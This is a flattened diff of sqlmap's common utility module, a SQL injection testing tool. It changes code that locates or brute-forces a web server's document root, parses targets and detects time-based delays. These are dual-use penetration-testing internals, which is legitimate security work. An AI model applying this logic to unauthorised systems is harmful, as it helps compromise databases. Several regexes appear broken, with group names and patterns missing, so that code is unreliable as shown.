getManualDirectories(): directories = None - pagePath = directoryPath(conf.path) - defaultDocRoot = DEFAULT_DOC_ROOTS.get(Backend.getOs(), DEFAULT_DOC_ROOTS[OS.LINUX]) if kb.absFilePaths: @@ -653,26 +720,30 @@ def getManualDirectories(): windowsDriveLetter, absFilePath = absFilePath[:2], absFilePath[2:] absFilePath = ntToPosixSlashes(posixToNtSlashes(absFilePath)) - if any("/%s/" % _ in absFilePath for _ in GENERIC_DOC_ROOT_DIRECTORY_NAMES): - for _ in GENERIC_DOC_ROOT_DIRECTORY_NAMES: - _ = "/%s/" % _ + for _ in list(GENERIC_DOC_ROOT_DIRECTORY_NAMES) + [conf.hostname]: + _ = "/%s/" % _ - if _ in absFilePath: - directories = "%s%s" % (absFilePath.split(_)[0], _) - break + if _ in absFilePath: + directories = "%s%s" % (absFilePath.split(_)[0], _) + break - if pagePath and pagePath in absFilePath: - directories = absFilePath.split(pagePath)[0] - if windowsDriveLetter: - directories = "%s/%s" % (windowsDriveLetter, ntToPosixSlashes(directories)) + if not directories and conf.path.strip('/') and conf.path in absFilePath: + directories = absFilePath.split(conf.path)[0] + + if directories and windowsDriveLetter: + directories = "%s/%s" % (windowsDriveLetter, ntToPosixSlashes(directories)) directories = normalizePath(directories) - if directories: + if conf.webRoot: + directories = [conf.webRoot] + infoMsg = "using '%s' as web server document root" % conf.webRoot + logger.info(infoMsg) + elif directories: infoMsg = "retrieved the web server document root: '%s'" % directories logger.info(infoMsg) else: - warnMsg = "unable to retrieve automatically the web server " + warnMsg = "unable to automatically retrieve the web server " warnMsg += "document root" logger.warn(warnMsg) @@ -683,17 +754,17 @@ def getManualDirectories(): message += "[2] custom location(s)\n" message += "[3] custom directory list file\n" message += "[4] brute force search" - choice = readInput(message, default="1").strip() + choice = readInput(message, default='1') - if choice == "2": + if choice == '2': message = "please provide a comma separate list of absolute directory paths: " directories = readInput(message, default="").split(',') - elif choice == "3": + elif choice == '3': message = "what's the list file location?\n" listPath = readInput(message, default="") checkFile(listPath) directories = getFileItems(listPath) - elif choice == "4": + elif choice == '4': targets = set([conf.hostname]) _ = conf.hostname.split('.') @@ -711,9 +782,14 @@ def getManualDirectories(): for suffix in BRUTE_DOC_ROOT_SUFFIXES: for target in targets: - item = "%s/%s" % (prefix, suffix) + if not prefix.endswith("/%s" % suffix): + item = "%s/%s" % (prefix, suffix) + else: + item = prefix + item = item.replace(BRUTE_DOC_ROOT_TARGET_MARK, target).replace("//", '/').rstrip('/') - directories.append(item) + if item not in directories: + directories.append(item) if BRUTE_DOC_ROOT_TARGET_MARK not in prefix: break @@ -749,11 +825,6 @@ def getAutoDirectories(): warnMsg = "unable to automatically parse any web server path" logger.warn(warnMsg) - _ = extractRegexResult(r"//[^/]+?(?P/.*)/", conf.url) # web directory - - if _: - retVal.add(_) - return list(retVal) def filePathToSafeString(filePath): @@ -826,12 +897,12 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status= else: message = data - if hasattr(conf, "api"): - sys.stdout.write(message, status, content_type) - else: - sys.stdout.write(setColor(message, bold)) - try: + if conf.get("api"): + sys.stdout.write(message, status, content_type) + else: + sys.stdout.write(setColor(message, bold)) + sys.stdout.flush() except IOError: pass @@ -850,7 +921,7 @@ def dataToTrafficFile(data): conf.trafficFP.flush() except IOError, ex: errMsg = "something went wrong while trying " - errMsg += "to write to the traffic file '%s' ('%s')" % (conf.trafficFile, ex) + errMsg += "to write to the traffic file '%s' ('%s')" % (conf.trafficFile, getSafeExString(ex)) raise SqlmapSystemException(errMsg) def dataToDumpFile(dumpFile, data): @@ -861,27 +932,40 @@ def dataToDumpFile(dumpFile, data): if "No space left" in getUnicode(ex): errMsg = "no space left on output device" logger.error(errMsg) + elif "Permission denied" in getUnicode(ex): + errMsg = "permission denied when flushing dump data" + logger.error(errMsg) else: raise - def dataToOutFile(filename, data): retVal = None if data: - retVal = os.path.join(conf.filePath, filePathToSafeString(filename)) + while True: + retVal = os.path.join(conf.filePath, filePathToSafeString(filename)) - try: - with open(retVal, "w+b") as f: - f.write(data) - except IOError, ex: - errMsg = "something went wrong while trying to write " - errMsg += "to the output file ('%s')" % ex.message - raise SqlmapGenericException(errMsg) + try: + with open(retVal, "w+b") as f: # has to stay as non-codecs because data is raw ASCII encoded data + f.write(unicodeencode(data)) + except UnicodeEncodeError, ex: + _ = normalizeUnicode(filename) + if filename != _: + filename = _ + else: + errMsg = "couldn't write to the " + errMsg += "output file ('%s')" % getSafeExString(ex) + raise SqlmapGenericException(errMsg) + except IOError, ex: + errMsg = "something went wrong while trying to write " + errMsg += "to the output file ('%s')" % getSafeExString(ex) + raise SqlmapGenericException(errMsg) + else: + break return retVal -def readInput(message, default=None, checkBatch=True): +def readInput(message, default=None, checkBatch=True, boolean=False): """ Reads input from terminal """ @@ -906,19 +990,19 @@ def readInput(message, default=None, checkBatch=True): answer = item.split('=')[1] if len(item.split('=')) > 1 else None if answer and question.lower() in message.lower(): retVal = getUnicode(answer, UNICODE_ENCODING) + elif answer is None and retVal: + retVal = "%s,%s" % (retVal, getUnicode(item, UNICODE_ENCODING)) - infoMsg = "%s%s" % (message, retVal) - logger.info(infoMsg) + if retVal: + dataToStdout("\r%s%s\n" % (message, retVal), forceOutput=True, bold=True) - debugMsg = "used the given answer" - logger.debug(debugMsg) - - break + debugMsg = "used the given answer" + logger.debug(debugMsg) if retVal is None: if checkBatch and conf.get("batch"): if isListLike(default): - options = ",".join(getUnicode(opt, UNICODE_ENCODING) for opt in default) + options = ','.join(getUnicode(opt, UNICODE_ENCODING) for opt in default) elif default: options = getUnicode(default, UNICODE_ENCODING) else: @@ -943,13 +1027,23 @@ def readInput(message, default=None, checkBatch=True): retVal = raw_input() or default retVal = getUnicode(retVal, encoding=sys.stdin.encoding) if retVal else retVal except: - time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893 - kb.prependFlag = True - raise SqlmapUserQuitException + try: + time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893 + except: + pass + finally: + kb.prependFlag = True + raise SqlmapUserQuitException finally: logging._releaseLock() + if retVal and default and isinstance(default, basestring) and len(default) == 1: + retVal = retVal.strip() + + if boolean: + retVal = retVal.strip().upper() == 'Y' + return retVal def randomRange(start=0, stop=1000, seed=None): @@ -961,7 +1055,12 @@ def randomRange(start=0, stop=1000, seed=None): 423 """ - randint = random.WichmannHill(seed).randint if seed is not None else random.randint + if seed is not None: + _ = getCurrentThreadData().random + _.seed(seed) + randint = _.randint + else: + randint = random.randint return int(randint(start, stop)) @@ -974,7 +1073,12 @@ def randomInt(length=4, seed=None): 874254 """ - choice = random.WichmannHill(seed).choice if seed is not None else random.choice + if seed is not None: + _ = getCurrentThreadData().random + _.seed(seed) + choice = _.choice + else: + choice = random.choice return int("".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length))) @@ -987,7 +1091,12 @@ def randomStr(length=4, lowercase=False, alphabet=None, seed=None): 'RNvnAv' """ - choice = random.WichmannHill(seed).choice if seed is not None else random.choice + if seed is not None: + _ = getCurrentThreadData().random + _.seed(seed) + choice = _.choice + else: + choice = random.choice if alphabet: retVal = "".join(choice(alphabet) for _ in xrange(0, length)) @@ -1016,14 +1125,17 @@ def getHeader(headers, key): break return retVal -def checkFile(filename): +def checkFile(filename, raiseOnError=True): """ Checks for file existence and readability """ valid = True - if filename is None or not os.path.isfile(filename): + try: + if filename is None or not os.path.isfile(filename): + valid = False + except UnicodeError: valid = False if valid: @@ -1033,18 +1145,25 @@ def checkFile(filename): except: valid = False - if not valid: + if not valid and raiseOnError: raise SqlmapSystemException("unable to read file '%s'" % filename) + return valid + def banner(): """ This function prints sqlmap banner with its version """ - _ = BANNER - if not getattr(LOGGER_HANDLER, "is_tty", False): - _ = re.sub("\033.+?m", "", _) - dataToStdout(_, forceOutput=True) + if not any(_ in sys.argv for _ in ("--version", "--api")): + _ = BANNER + + if not getattr(LOGGER_HANDLER, "is_tty", False) or "--disable-coloring" in sys.argv: + _ = re.sub("\033.+?m", "", _) + elif IS_WIN: + coloramainit() + + dataToStdout(_, forceOutput=True) def parsePasswordHash(password): """ @@ -1077,19 +1196,20 @@ def cleanQuery(query): for sqlStatements in SQL_STATEMENTS.values(): for sqlStatement in sqlStatements: - sqlStatementEsc = sqlStatement.replace("(", "\\(") - queryMatch = re.search("(%s)" % sqlStatementEsc, query, re.I) + queryMatch = re.search("(?i)\b(%s)\b" % sqlStatement.replace("(", "").replace(")", "").strip(), query) if queryMatch and "sys_exec" not in query: retVal = retVal.replace(queryMatch.group(1), sqlStatement.upper()) return retVal -def setPaths(): +def setPaths(rootPath): """ Sets absolute paths for project directories and files """ + paths.SQLMAP_ROOT_PATH = rootPath + # sqlmap paths paths.SQLMAP_EXTRAS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "extra") paths.SQLMAP_PROCS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "procs") @@ -1103,7 +1223,8 @@ def setPaths(): paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads") _ = os.path.join(os.path.expandvars(os.path.expanduser("~")), ".sqlmap") - paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding()) + paths.SQLMAP_HOME_PATH = _ + paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") @@ -1112,7 +1233,7 @@ def setPaths(): paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst") paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst") paths.GITHUB_HISTORY = os.path.join(_, "github.hst") - paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr()) + paths.CHECKSUM_MD5 = os.path.join(paths.SQLMAP_TXT_PATH, "checksum.md5") paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt") paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt") paths.COMMON_OUTPUTS = os.path.join(paths.SQLMAP_TXT_PATH, 'common-outputs.txt') @@ -1151,11 +1272,13 @@ def parseTargetDirect(): if not conf.direct: return + conf.direct = conf.direct.encode(UNICODE_ENCODING) # some DBMS connectors (e.g. pymssql) don't like Unicode with non-US letters + details = None remote = False for dbms in SUPPORTED_DBMS: - details = re.search("^(?P%s)://(?P(?P.+?)\:(?P.*)\@)?(?P(?P.+?)\:(?P[\d]+)\/)?(?P[\w\d\ \:\.\_\-\/\\\\]+?)$" % dbms, conf.direct, re.I) + details = re.search("^(?P%s)://(?P(?P.+?)\:(?P.*)\@)?(?P(?P[\w.-]+?)\:(?P[\d]+)\/)?(?P[\w\d\ \:\.\_\-\/\\\\]+?)$" % dbms, conf.direct, re.I) if details: conf.dbms = details.group("dbms") @@ -1167,8 +1290,8 @@ def parseTargetDirect(): if conf.dbmsCred: conf.dbmsUser, conf.dbmsPass = conf.dbmsCred.split(':') else: - conf.dbmsUser = unicode() - conf.dbmsPass = unicode() + conf.dbmsUser = "" + conf.dbmsPass = "" if not conf.dbmsPass: conf.dbmsPass = None @@ -1237,7 +1360,7 @@ def parseTargetDirect(): else: errMsg = "sqlmap requires '%s' third-party library " % data[1] errMsg += "in order to directly connect to the DBMS " - errMsg += "%s. You can download it from '%s'" % (dbmsName, data[2]) + errMsg += "'%s'. You can download it from '%s'" % (dbmsName, data[2]) errMsg += ". Alternative is to use a package 'python-sqlalchemy' " errMsg += "with support for dialect '%s' installed" % data[3] raise SqlmapMissingDependence(errMsg) @@ -1270,7 +1393,7 @@ def parseTargetUrl(): try: urlSplit = urlparse.urlsplit(conf.url) except ValueError, ex: - errMsg = "invalid URL '%s' has been given ('%s'). " % (conf.url, ex) + errMsg = "invalid URL '%s' has been given ('%s'). " % (conf.url, getSafeExString(ex)) errMsg += "Please be sure that you don't have any leftover characters (e.g. '[' or ']') " errMsg += "in the hostname part" raise SqlmapGenericException(errMsg) @@ -1291,8 +1414,8 @@ def parseTargetUrl(): except UnicodeError: _ = None - if any((_ is None, re.search(r'\s', conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'))): - errMsg = "invalid target URL" + if any((_ is None, re.search(r'\s', conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'), '\n' in originalUrl)): + errMsg = "invalid target URL ('%s')" % originalUrl raise SqlmapSyntaxException(errMsg) if len(hostnamePort) == 2: @@ -1306,22 +1429,29 @@ def parseTargetUrl(): else: conf.port = 80 - if urlSplit.query: - conf.parameters[PLACE.GET] = urldecode(urlSplit.query) if urlSplit.query and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in urlSplit.query else urlSplit.query + if conf.port < 0 or conf.port > 65535: + errMsg = "invalid target URL's port (%d)" % conf.port + raise SqlmapSyntaxException(errMsg) conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path)) conf.url = conf.url.replace(URI_QUESTION_MARKER, '?') + if urlSplit.query: + if '=' not in urlSplit.query: + conf.url = "%s?%s" % (conf.url, getUnicode(urlSplit.query)) + else: + conf.parameters[PLACE.GET] = urldecode(urlSplit.query) if urlSplit.query and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in urlSplit.query else urlSplit.query + if not conf.referer and (intersect(REFERER_ALIASES, conf.testParameter, True) or conf.level >= 3): debugMsg = "setting the HTTP Referer header to the target URL" logger.debug(debugMsg) - conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.REFERER, conf.httpHeaders) + conf.httpHeaders = [_ for _ in conf.httpHeaders if _[0] != HTTP_HEADER.REFERER] conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url.replace(CUSTOM_INJECTION_MARK_CHAR, ""))) if not conf.host and (intersect(HOST_ALIASES, conf.testParameter, True) or conf.level >= 5): debugMsg = "setting the HTTP Host header to the target URL" logger.debug(debugMsg) - conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.HOST, conf.httpHeaders) + conf.httpHeaders = [_ for _ in conf.httpHeaders if _[0] != HTTP_HEADER.HOST] conf.httpHeaders.append((HTTP_HEADER.HOST, getHostHeader(conf.url))) if conf.url != originalUrl: @@ -1367,7 +1497,7 @@ def expandAsteriskForColumns(expression): return expression -def getLimitRange(count, dump=False, plusOne=False): +def getLimitRange(count, plusOne=False): """ Returns range of values used in limit/offset constructs @@ -1379,7 +1509,7 @@ def getLimitRange(count, dump=False, plusOne=False): count = int(count) limitStart, limitStop = 1, count - if dump: + if kb.dumpTable: if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop: limitStop = conf.limitStop @@ -1442,7 +1572,7 @@ def parseFilePaths(page): """ if page: - for regex in (r" in (?P.*?) on line", r"(?:>|\s)(?P[A-Za-z]:[\\/][\w.\\/]*)", r"(?:>|\s)(?P/\w[/\w.]+)"): + for regex in FILE_PATH_REGEXES: for match in re.finditer(regex, page): absFilePath = match.group("result").strip() page = page.replace(absFilePath, "") @@ -1584,9 +1714,10 @@ def safeExpandUser(filepath): try: retVal = os.path.expanduser(filepath) - except UnicodeDecodeError: + except UnicodeError: _ = locale.getdefaultlocale() - retVal = getUnicode(os.path.expanduser(filepath.encode(_[1] if _ and len(_) > 1 else UNICODE_ENCODING))) + encoding = _[1] if _ and len(_) > 1 else UNICODE_ENCODING + retVal = getUnicode(os.path.expanduser(filepath.encode(encoding)), encoding=encoding) return retVal @@ -1619,12 +1750,23 @@ def safeStringFormat(format_, params): index = retVal.find("%s", start) retVal = retVal[:index] + getUnicode(param) + retVal[index + 2:] else: + if any('%s' in _ for _ in conf.parameters.values()): + parts = format_.split(' ') + for i in xrange(len(parts)): + if PAYLOAD_DELIMITER in parts[i]: + parts[i] = parts[i].replace(PAYLOAD_DELIMITER, "") + parts[i] = "%s%s" % (parts[i], PAYLOAD_DELIMITER) + break + format_ = ' '.join(parts) + count = 0 while True: match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal) if match: if count >= len(params): - raise Exception("wrong number of parameters during string formatting") + warnMsg = "wrong number of parameters during string formatting. " + warnMsg += "Please report by e-mail content \"%r | %r | %r\" to 'dev@sqlmap.org'" % (format_, params, retVal) + raise SqlmapValueException(warnMsg) else: retVal = re.sub(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>" % params[count], retVal, 1) count += 1 @@ -1632,7 +1774,7 @@ def safeStringFormat(format_, params): break return retVal -def getFilteredPageContent(page, onlyText=True): +def getFilteredPageContent(page, onlyText=True, split=" "): """ Returns filtered page content without script, style and/or comments or all HTML tags @@ -1645,10 +1787,10 @@ def getFilteredPageContent(page, onlyText=True): # only if the page's charset has been successfully identified if isinstance(page, unicode): - retVal = re.sub(r"(?si)||%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), " ", page) - while retVal.find(" ") != -1: - retVal = retVal.replace(" ", " ") - retVal = htmlunescape(retVal.strip()) + retVal = re.sub(r"(?si)||%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), split, page) + while retVal.find(2 * split) != -1: + retVal = retVal.replace(2 * split, split) + retVal = htmlunescape(retVal.strip().strip(split)) return retVal @@ -1724,7 +1866,7 @@ def posixToNtSlashes(filepath): 'C:\\\\Windows' """ - return filepath.replace('/', '\\') + return filepath.replace('/', '\\') if filepath else filepath def ntToPosixSlashes(filepath): """ @@ -1735,7 +1877,7 @@ def ntToPosixSlashes(filepath): 'C:/Windows' """ - return filepath.replace('\\', '/') + return filepath.replace('\\', '/') if filepath else filepath def isHexEncodedString(subject): """ @@ -1765,7 +1907,7 @@ def getConsoleWidth(default=80): FNULL = open(os.devnull, 'w') except IOError: FNULL = None - process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL or PIPE) + process = subprocess.Popen("stty size", shell=True, stdout=subprocess.PIPE, stderr=FNULL or subprocess.PIPE) stdout, _ = process.communicate() items = stdout.split() @@ -1806,8 +1948,8 @@ def parseXmlFile(xmlFile, handler): with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream: parse(stream, handler) except (SAXParseException, UnicodeError), ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, ex) + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" raise SqlmapInstallationException, errMsg @@ -1826,7 +1968,7 @@ def getSQLSnippet(dbms, sfile, **variables): retVal = readCachedFileContent(filename) retVal = re.sub(r"#.+", "", retVal) - retVal = re.sub(r"(?s);\s+", "; ", retVal).strip("\r\n") + retVal = re.sub(r";\s+", "; ", retVal).strip("\r\n") for _ in variables.keys(): retVal = re.sub(r"%%%s%%" % _, variables[_], retVal) @@ -1844,9 +1986,8 @@ def getSQLSnippet(dbms, sfile, **variables): logger.error(errMsg) msg = "do you want to provide the substitution values? [y/N] " - choice = readInput(msg, default="N") - if choice and choice[0].lower() == "y": + if readInput(msg, default='N', boolean=True): for var in variables: msg = "insert value for variable '%s': " % var val = readInput(msg, default="") @@ -1863,8 +2004,13 @@ def readCachedFileContent(filename, mode='rb'): with kb.locks.cache: if filename not in kb.cache.content: checkFile(filename) - with openFile(filename, mode) as f: - kb.cache.content[filename] = f.read() + try: + with openFile(filename, mode) as f: + kb.cache.content[filename] = f.read() + except (IOError, OSError, MemoryError), ex: + errMsg = "something went wrong while trying " + errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) return kb.cache.content[filename] @@ -1982,7 +2128,7 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un retVal.append(line) except (IOError, OSError, MemoryError), ex: errMsg = "something went wrong while trying " - errMsg += "to read the content of file '%s' ('%s')" % (filename, ex) + errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) raise SqlmapSystemException(errMsg) return retVal if not unique else retVal.keys() @@ -2107,21 +2253,20 @@ def getUnicode(value, encoding=None, noneToNull=False): if noneToNull and value is None: return NULL - if isListLike(value): - value = list(getUnicode(_, encoding, noneToNull) for _ in value) - return value - if isinstance(value, unicode): return value elif isinstance(value, basestring): while True: try: - return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING) + return unicode(value, encoding or (kb.get("pageEncoding") if kb.get("originalPage") else None) or UNICODE_ENCODING) except UnicodeDecodeError, ex: try: return unicode(value, UNICODE_ENCODING) except: value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:] + elif isListLike(value): + value = list(getUnicode(_, encoding, noneToNull) for _ in value) + return value else: try: return unicode(value) @@ -2162,7 +2307,22 @@ def pushValue(value): Push value to the stack (thread dependent) """ - getCurrentThreadData().valueStack.append(copy.deepcopy(value)) + _ = None + success = False + + for i in xrange(PUSH_VALUE_EXCEPTION_RETRY_COUNT): + try: + getCurrentThreadData().valueStack.append(copy.deepcopy(value)) + success = True + break + except Exception, ex: + _ = ex + + if not success: + getCurrentThreadData().valueStack.append(None) + + if _: + raise _ def popValue(): """ @@ -2185,7 +2345,7 @@ def wasLastResponseDBMSError(): def wasLastResponseHTTPError(): """ - Returns True if the last web request resulted in an errornous HTTP code (like 500) + Returns True if the last web request resulted in an erroneous HTTP code (like 500) """ threadData = getCurrentThreadData() @@ -2200,30 +2360,33 @@ def wasLastResponseDelayed(): # response times should be inside +-7*stdev([normal response times]) # Math reference: http://www.answers.com/topic/standard-deviation - deviation = stdev(kb.responseTimes) + deviation = stdev(kb.responseTimes.get(kb.responseTimeMode, [])) threadData = getCurrentThreadData() - if deviation and not conf.direct: - if len(kb.responseTimes) < MIN_TIME_RESPONSES: + if deviation and not conf.direct and not conf.disableStats: + if len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: warnMsg = "time-based standard deviation method used on a model " warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES logger.warn(warnMsg) - lowerStdLimit = average(kb.responseTimes) + TIME_STDEV_COEFF * deviation + lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit)) if not kb.testMode and retVal: if kb.adjustTimeDelay is None: msg = "do you want sqlmap to try to optimize value(s) " msg += "for DBMS delay responses (option '--time-sec')? [Y/n] " - choice = readInput(msg, default='Y') - kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if choice.upper() == 'N' else ADJUST_TIME_DELAY.YES + + kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if not readInput(msg, default='Y', boolean=True) else ADJUST_TIME_DELAY.YES if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit) return retVal else: - return (threadData.lastQueryDuration - conf.timeSec) >= 0 + delta = threadData.lastQueryDuration - conf.timeSec + if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): # MySQL's SLEEP(X) lasts 0.05 seconds shorter on average + delta += 0.05 + return delta >= 0 def adjustTimeDelay(lastQueryDuration, lowerStdLimit): """ @@ -2270,6 +2433,32 @@ def extractErrorMessage(page): return retVal +def findLocalPort(ports): + """ + Find the first opened localhost port from a given list of ports (e.g. for Tor port checks) + """ + + retVal = None + + for port in ports: + try: + try: + s = socket._orig_socket(socket.AF_INET, socket.SOCK_STREAM) + except AttributeError: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((LOCALHOST, port)) + retVal = port + break + except socket.error: + pass + finally: + try: + s.close() + except socket.error: + pass + + return retVal + def findMultipartPostBoundary(post): """ Finds value for a boundary parameter in given multipart POST body @@ -2282,6 +2471,7 @@ def findMultipartPostBoundary(post): for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""): _ = match.group(1).strip().strip('-') + if _ in done: continue else: @@ -2355,7 +2545,7 @@ def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False): # corner case when character % really needs to be # encoded (when not representing URL encoded char) # except in cases when tampering scripts are used - if all(map(lambda x: '%' in x, [safe, value])) and not kb.tamperFunctions: + if all('%' in _ for _ in (safe, value)) and not kb.tamperFunctions: value = re.sub("%(?![0-9a-fA-F]{2})", "%25", value) while True: @@ -2412,17 +2602,19 @@ def logHTTPTraffic(requestLogMsg, responseLogMsg): Logs HTTP traffic to the output file """ - if not conf.trafficFile: - return + if conf.harFile: + conf.httpCollector.collectRequest(requestLogMsg, responseLogMsg) - with kb.locks.log: - dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep)) - dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep)) - dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep)) + if not conf.trafficFile: + with kb.locks.log: + dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep)) + dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep)) + dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep)) def getPageTemplate(payload, place): # Cross-linked function raise NotImplementedError +@cachedmethod def getPublicTypeMembers(type_, onlyValues=False): """ Useful for getting members from types (e.g. in enums) @@ -2431,12 +2623,16 @@ def getPublicTypeMembers(type_, onlyValues=False): ['Linux', 'Windows'] """ + retVal = [] + for name, value in inspect.getmembers(type_): - if not name.startswith('__'): + if not name.startswith("__"): if not onlyValues: - yield (name, value) + retVal.append((name, value)) else: - yield value + retVal.append(value) + + return retVal def enumValueToNameLookup(type_, value_): """ @@ -2485,9 +2681,12 @@ def extractTextTagContent(page): page = page or "" if REFLECTED_VALUE_MARKER in page: - page = re.sub(r"(?si)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page) + try: + page = re.sub(r"(?i)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page) + except MemoryError: + page = page.replace(REFLECTED_VALUE_MARKER, "") - return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page))) + return filter(None, (_.group("result").strip() for _ in re.finditer(TEXT_TAG_REGEX, page))) def trimAlphaNum(value): """ @@ -2580,7 +2779,7 @@ def findDynamicContent(firstPage, secondPage): prefix = trimAlphaNum(prefix) suffix = trimAlphaNum(suffix) - kb.dynamicMarkings.append((re.escape(prefix[-DYNAMICITY_MARK_LENGTH / 2:]) if prefix else None, re.escape(suffix[:DYNAMICITY_MARK_LENGTH / 2]) if suffix else None)) + kb.dynamicMarkings.append((prefix[-DYNAMICITY_MARK_LENGTH / 2:] if prefix else None, suffix[:DYNAMICITY_MARK_LENGTH / 2] if suffix else None)) if len(kb.dynamicMarkings) > 0: infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '') @@ -2599,11 +2798,11 @@ def removeDynamicContent(page): if prefix is None and suffix is None: continue elif prefix is None: - page = re.sub(r'(?s)^.+%s' % re.escape(suffix), suffix, page) + page = re.sub(r"(?s)^.+%s" % re.escape(suffix), suffix.replace('\\', r'\\'), page) elif suffix is None: - page = re.sub(r'(?s)%s.+$' % re.escape(prefix), prefix, page) + page = re.sub(r"(?s)%s.+$" % re.escape(prefix), prefix.replace('\\', r'\\'), page) else: - page = re.sub(r'(?s)%s.+%s' % (re.escape(prefix), re.escape(suffix)), '%s%s' % (prefix, suffix), page) + page = re.sub(r"(?s)%s.+%s" % (re.escape(prefix), re.escape(suffix)), "%s%s" % (prefix.replace('\\', r'\\'), suffix.replace('\\', r'\\')), page) return page @@ -2677,7 +2876,7 @@ def parseSqliteTableSchema(value): table = {} columns = {} - for match in re.finditer(r"(\w+)\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I): + for match in re.finditer(r"(\w+)[\"'`]?\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I): columns[match.group(1)] = match.group(2) table[conf.tbl] = columns @@ -2737,9 +2936,61 @@ def setOptimize(): conf.nullConnection = not any((conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor)) if not conf.nullConnection: - debugMsg = "turning off --null-connection switch used indirectly by switch -o" + debugMsg = "turning off switch '--null-connection' used indirectly by switch '-o'" logger.debug(debugMsg) +def saveConfig(conf, filename): + """ + Saves conf to configuration filename + """ + + config = UnicodeRawConfigParser() + userOpts = {} + + for family in optDict.keys(): + userOpts[family] = [] 